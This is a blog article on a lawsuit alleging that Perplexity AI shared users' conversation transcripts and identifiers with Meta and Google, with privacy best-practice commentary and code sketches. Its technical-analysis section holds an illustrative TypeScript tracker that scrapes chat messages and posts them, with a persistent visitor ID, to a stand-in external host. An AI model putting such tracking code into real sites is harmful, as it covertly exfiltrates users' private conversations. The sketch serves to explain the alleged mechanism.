Meta and Google Targeted in Perplexity AI Lawsuit Over Secret Data Sharing Practices
- Chen Ling

- Apr 4
- 5 min read

The rapid rise of artificial intelligence has reshaped how we interact with technology, offering convenience, automation, and unprecedented insights. Yet, the surge in AI adoption has also intensified scrutiny over privacy and ethical use. Perplexity AI, a prominent AI-powered search engine and conversational platform, now finds itself at the center of multiple high-profile lawsuits, raising critical questions about data security, user trust, and corporate accountability.
The Allegations: Incognito Mode as a Sham
A proposed class-action lawsuit filed in California highlights alarming allegations. According to the complaint, Perplexity AI allegedly shared sensitive user data with Meta and Google, even when users activated the platform’s “Incognito Mode.” The lawsuit claims:
Trackers embedded on the homepage give Meta and Google full access to users' AI conversations.
Data shared includes IP addresses, email addresses, geolocation, and entire conversation transcripts.
Sensitive topics, such as legal advice, health issues, investment strategies, and family finances, were allegedly transmitted.
These practices allegedly violate the federal Electronic Communications Privacy Act and California privacy laws, including the state's wiretapping statutes.
As the lawsuit asserts, “No reasonable person would have expected that Perplexity would share complete transcripts of their conversations … with companies like Meta and Google.”
This issue is not isolated. The complaint notes that data collection occurs regardless of subscription status and persists even when users believe they are protected by privacy-focused features.
Legal and Regulatory Context
Privacy concerns in AI are intensifying globally. The Perplexity case echoes prior controversies around “private” browsing modes, including Google Chrome’s Incognito and Safari’s Private Browsing. Historically, such features were intended to protect local device histories, but high-profile lawsuits have exposed gaps in actual privacy protection.
Regulators and courts are increasingly emphasizing transparency and informed consent. Companies failing to implement robust privacy measures may face:
Class-action lawsuits with potential multi-million-dollar settlements.
Injunctions restricting AI functionality, as seen in prior cases involving Perplexity's Comet AI browser and web scraping.
Increased regulatory oversight under laws such as the California Consumer Privacy Act (CCPA) and the European Union’s GDPR.
Legal experts warn that the stakes for AI developers are higher than ever. “Transparency is no longer optional. AI companies must clearly articulate how user data is collected, stored, and shared,” notes cybersecurity analyst Dr. Amelia Chen.
Implications for Users and Privacy
From a user perspective, these allegations highlight the limitations of relying on default privacy features. Users interacting with AI platforms often share highly personal information under the assumption of confidentiality. The Perplexity lawsuits illustrate several key concerns:
False Sense of Security: Users trust features like Incognito Mode, yet these protections may be incomplete.
Data Exploitation: Sensitive personal information, including health, financial, and legal data, could be monetized without explicit consent.
Behavioral Tracking: AI platforms can create detailed profiles of user behavior, raising ethical concerns regarding targeted advertising and decision-making manipulation.
This raises broader questions for AI adoption: How much can users trust the systems they interact with daily, and what safeguards are necessary to ensure privacy without hindering innovation?
AI, Corporate Responsibility, and Ethical Design
The Perplexity allegations underscore a pressing need for ethical AI design. Companies developing AI systems face a dual mandate: leveraging data to improve services while protecting user rights. Best practices emerging across the industry include:
Data Minimization: Collect only what is essential for functionality.
End-to-End Encryption: Secure sensitive communications against unauthorized access.
Transparent User Consent: Clearly inform users how their data will be used and shared (a consent-gating sketch follows this list).
Independent Audits: Conduct third-party privacy audits to validate compliance.
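The first three of these practices can be made concrete in a few lines of code. The TypeScript sketch below is a minimal illustration, assuming a hypothetical analytics endpoint and event schema (none of it drawn from any of the companies' actual systems): collection is gated on explicit opt-in consent, and the payload is minimized so that no transcripts, emails, or identifiers leave the client.

```typescript
// Hypothetical, minimal analytics event: only what the feature needs, never transcripts.
interface MinimalAnalyticsEvent {
  eventName: "search_submitted" | "answer_rendered";
  timestamp: number;
  appVersion: string; // coarse, non-identifying context only
}

interface ConsentState {
  analyticsAllowed: boolean; // set only by an explicit, informed opt-in UI
}

function sendAnalytics(
  event: MinimalAnalyticsEvent,
  consent: ConsentState,
  endpoint: string
): void {
  // Transparent consent: drop the event entirely unless the user opted in.
  if (!consent.analyticsAllowed) return;

  // Data minimization: no IP logging, no email, no conversation text in the payload.
  void fetch(endpoint, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(event),
  });
}

// Usage: nothing is transmitted until the user has explicitly consented.
sendAnalytics(
  { eventName: "search_submitted", timestamp: Date.now(), appVersion: "1.0.0" },
  { analyticsAllowed: false }, // no opt-in recorded, so the call is a no-op
  "https://example.com/analytics" // placeholder endpoint
);
```

The design choice worth noting is that consent is checked at the point of transmission, so a missing or revoked opt-in fails safe to sending nothing at all.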
Ethical AI frameworks are increasingly influencing regulatory standards. The IEEE and the OECD have published guidelines emphasizing accountability, transparency, and respect for human rights in AI design.
The Broader Market Impact
The Perplexity case has implications beyond the company itself, affecting AI platforms, advertisers, and enterprise adoption. Potential consequences include:
Investor Scrutiny: Privacy lawsuits may influence investment decisions and valuations.
Regulatory Pressure: Legal precedents could tighten rules for AI data usage, particularly in the U.S. and EU markets.
Consumer Confidence: User trust is critical for platform growth, and allegations of data misuse may hinder adoption.
A recent survey by TechInsights indicates that 72% of AI users are concerned about how platforms handle sensitive data. Perceived misuse could accelerate the shift toward privacy-focused AI alternatives.

Technical Analysis of Alleged Data Sharing
According to the filings, the mechanisms involved in the alleged data sharing were highly sophisticated:
Tracking Scripts: Installed automatically upon landing on Perplexity’s homepage, these scripts allegedly transmitted full conversation transcripts.
Persistent Identifiers: IP addresses and email accounts may have been linked to conversation histories.
Commercial Exploitation: The data allegedly enabled targeted advertising, potentially influencing financial and health decisions.
These practices, if proven, illustrate how AI systems can inadvertently—or deliberately—expose highly sensitive user information. Cybersecurity experts emphasize that even anonymized data can often be re-identified through correlation techniques.
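For readers unfamiliar with how such tracking works, the sketch below shows, in generic TypeScript, how any third-party script embedded in a page can read rendered content and forward it to an external endpoint alongside a persistent identifier. It is a hypothetical illustration of the class of behavior the complaint describes; the endpoint, selector, and storage key are invented, and nothing here is taken from Perplexity's, Meta's, or Google's actual code.

```typescript
// Hypothetical third-party tracker; all names and endpoints are illustrative only.
const TRACKER_ENDPOINT = "https://tracker.example.com/collect"; // invented endpoint

// A persistent identifier kept in localStorage lets separate visits
// be linked into a single behavioral profile.
function getOrCreateVisitorId(): string {
  const existing = localStorage.getItem("visitor_id");
  if (existing) return existing;
  const id = crypto.randomUUID();
  localStorage.setItem("visitor_id", id);
  return id;
}

// Any script included on a page inherits full DOM access, so it can read
// whatever is rendered, including chat transcripts, and transmit it off-site.
function reportPageContent(): void {
  const transcript = Array.from(document.querySelectorAll(".chat-message")) // invented selector
    .map((node) => node.textContent ?? "")
    .join("\n");

  void fetch(TRACKER_ENDPOINT, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      visitorId: getOrCreateVisitorId(),
      url: location.href,
      transcript, // this is the point where sensitive content leaves the page
    }),
  });
}

reportPageContent();
```

The takeaway is that an embedded tracker needs no exploit: it runs with the same privileges as the site's own code, which is why auditing third-party scripts is a baseline privacy control.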
Industry Response and Corporate Statements
Perplexity, Google, and Meta have responded differently. Perplexity's Chief Communications Officer, Jesse Dwyer, stated that the company had not been served with the lawsuit and could not verify the allegations. Meta acknowledged that it has policies restricting the sharing of sensitive data but emphasized that responsibility for compliance lies with advertisers. Google has not publicly commented.
Experts suggest that corporate transparency and proactive engagement with regulators can mitigate reputational damage. As AI platforms continue to evolve, user trust may become a critical differentiator for market success.
The Role of Human Oversight in AI
These legal and ethical concerns reinforce the importance of human oversight. While AI can automate tasks and analyze vast datasets, humans must guide critical decisions, including:
Privacy policy implementation and compliance.
Risk assessment for data collection and monetization.
Ethical auditing and bias mitigation.
Industry leaders highlight that AI’s potential will be constrained unless companies integrate robust ethical governance and human accountability.
Emerging Solutions and Best Practices
To address privacy concerns, AI companies are exploring several solutions:
Zero-Knowledge AI Protocols: Systems designed so that servers never see raw user data, only the outputs needed to provide functionality.
Local AI Processing: Executing AI models on user devices rather than cloud servers, reducing data exposure.
Differential Privacy: Mathematical techniques that ensure aggregate outputs do not compromise individual user information (see the sketch after this list).
Regulatory Sandbox Programs: Pilot testing AI systems under regulatory oversight before full public release.
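Of these, differential privacy is the most mathematically concrete: calibrated random noise is added to aggregate statistics so that no single user's contribution can be distinguished in the output. The TypeScript sketch below implements the standard Laplace mechanism for a counting query; the epsilon value and the example data are illustrative assumptions, not parameters from any production system.

```typescript
// Laplace mechanism: add noise with scale = sensitivity / epsilon to a query result.
// For a counting query, adding or removing one user changes the count by at most 1,
// so the sensitivity is 1.
function sampleLaplace(scale: number): number {
  // Inverse-CDF sampling of a Laplace distribution centered at 0.
  const u = Math.random() - 0.5;
  return -scale * Math.sign(u) * Math.log(1 - 2 * Math.abs(u));
}

function privateCount(values: boolean[], epsilon: number): number {
  const trueCount = values.filter(Boolean).length;
  const sensitivity = 1;
  return trueCount + sampleLaplace(sensitivity / epsilon);
}

// Example: release how many users in a batch asked about a sensitive topic.
// Smaller epsilon means more noise and stronger privacy for each individual.
const askedAboutTopic = [true, false, true, true, false, false, true];
console.log(privateCount(askedAboutTopic, 0.5));
```

The released count remains useful in aggregate, yet whether any particular user belongs to the sensitive group cannot be inferred with confidence from the noisy output.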
Adopting such strategies may restore trust while maintaining the capabilities that make AI platforms valuable.
Privacy, Trust, and the Future of AI
The Perplexity AI lawsuits illuminate the complex intersection of AI innovation, user privacy, and corporate accountability. As AI becomes integral to daily life, companies must prioritize transparent practices, ethical data usage, and human oversight. Privacy breaches, whether real or perceived, have the potential to erode public trust and hinder adoption.
For organizations and users alike, the message is clear: trust in AI is earned, not assumed. Companies like Perplexity, Google, and Meta are now navigating an environment where ethical responsibility and technical excellence are inseparable.
The expert team at 1950.ai, led by Dr. Shahid Masood, emphasizes that the AI revolution must balance innovation with ethical governance, ensuring that technological advancement does not come at the expense of fundamental human rights. Users must remain vigilant, and developers must prioritize privacy as a core design principle.
Follow insights from Dr. Shahid Masood and the 1950.ai team to understand emerging AI regulations, privacy safeguards, and the future of responsible artificial intelligence.
Further Reading / External References
Bloomberg, “Perplexity AI Machine Accused of Sharing Data With Meta, Google” | https://www.bloomberg.com/news/articles/2026-04-01/perplexity-ai-machine-accused-of-sharing-data-with-meta-google
Tom’s Guide, “Perplexity is Being Sued for Allegedly Sharing User Data With Meta and Google” | https://www.tomsguide.com/ai/perplexity-is-being-sued-for-allegedly-sharing-user-data-with-meta-and-google-heres-what-we-know-so-far
Inc., Chloe Aiello, “Lawsuit Alleges Perplexity is Sharing Data With Tech Giants” | https://www.inc.com/chloe-aiello/lawsuit-alleges-perplexity-is-sharing-data-with-tech-giants/91326739



